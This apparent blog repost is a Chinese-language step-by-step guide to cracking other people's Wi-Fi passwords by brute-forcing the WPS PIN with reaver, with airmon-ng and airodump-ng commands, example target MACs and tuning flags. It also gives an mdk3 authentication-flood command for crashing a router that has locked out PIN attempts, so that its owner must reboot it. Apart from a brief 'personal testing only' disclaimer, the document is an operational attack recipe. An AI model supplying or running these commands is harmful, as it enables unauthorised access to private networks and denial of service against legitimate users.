PIN码PJ
PIN碼破密特點:
1、不需要客戶端 2、有PIN碼就能獲得無線密碼 3、八位數PIN碼實際只有一萬一千組隨機密碼 4、抓包、EWSA跑包,每個環節都有很大的不確定性,而PIN破密,只要開戶WPS,破密只是個時間問題。提醒:只限于個人測試使用,由于非法操作引起的相關法律責任與本作者無關。
reaver使用方法、步驟:
1、打開超級終端 ROOt shell??
2、如果電腦裝有多個無線網卡,請先發指令 3、ifconfig -a
4、確認你用哪一個網卡WLAN0或WLAN1
下面的指令都是以單一網卡WLAN0為例
一、激活監聽模式: airmon-ng start wlan0 ? 二、查看周邊AP信息(抓包):
airodump-ng??mon0 wash -i mon0 -C ? 觀察要破AP的PWR信號強弱變化,注意同頻干擾,調整網卡放置位置和角度、方向。 ? PWR 小于 -75 基本上會Timeout, PWR-60左右,則非常順暢(2-6秒攻擊一次) ? 三、按Ctrl+C終止抓包
四、 抓PIN碼:
reaver -i mon0 -b MAC??-vv
例如: reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -a -S -d 0 -t 1 ? 1.4版可用: reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v???(可用一個v) ? 注意,MAC中冒號不可省略,MAC地址的字母大小寫均可,?-vv是兩個V不是W!
?
?
特別提示:
只有AP開啟了WPS、QSS功能,才可以用PIN法破PSK密碼!
如何查看AP是否開了WPS、QSS呢?
一、使用指令:
airodump-ng??mon0
MB一欄下,出現??54e.?(看清楚有點“.”) 是開WPS的
AP關閉了WPS、或者沒有QSS滴,會出現
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX??(ESSID: XXXX)
PIN破密對信號要求極為嚴格,如果信號稍差,可能導致破密進度變慢或者路由死鎖等(重復同一個PIN碼 或?timeout),特別是1、6默認頻道中,有較多的AP,相互干擾,因此,確定網卡放置的最佳位置、方向、角度十分重要。
破解過程中 ,重復同一個PIN碼 或?timeout?可隨時隨地按Ctrl+C終止,reaver會自動保存進度。
重復第2-4項內容,先看看AP信號強弱或是否關機,若繼續破,則再次在終端中發送: reaver -i mon0 -b MAC -vv
當reaver確定前4位PIN密碼后,其工作完成任務進度數值將直接跳躍至90.9%以上,也就是說只剩余一千個密碼組合了??偣惨蝗f一千個密碼。
曙光就在前頭,勝利往往在 再堅持一下的努力之中。
如果,90.9%進程后死機或停機,請記下PIN前四位數,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位數)
會從指定PIN段起破密。 額外:(假如pin死了,就用命令強制讓路由器重啟) 首先檢測網卡:
ifconfig -a
然后模擬端口:
airmon-ng start wlan0
接下來用:
airodump-ng mon0 ??//掃描ap找到你pin死的路由器mac 用mdk3 做身份驗證攻擊
mdk3 mon0 a -a mac(被pin死的路由器的mac)
身份驗證攻擊效果說明:
此攻擊是針對無線AP的洪水攻擊,又叫做身份驗證攻擊。其原理就是向AP發動大量的虛假的鏈接請求,這種請求數量一旦超 過了無線AP所能承受的范圍,AP就會自動斷開現有鏈接,使合法用戶無法使用無線網絡。迫使路由主人重啟路由器。
說明:
此命令功能強大,使用錯誤會造成所有ap不能使用,請指定mac地址,然后使用,其余命令不要亂試。你要使用此命令的其他參數,請詳細閱讀此命令參數詳解。 此操作會讓路由器完全宕機,不但無線不能用,有線的也連接不了,必須重啟路由器! 請謹慎使用!
轉載于:https://www.cnblogs.com/thywings/archive/2013/01/29/2882158.html
總結
- 上一篇: [题解]POJ 3683 Priest
- 下一篇: 记录些实用的linux指令串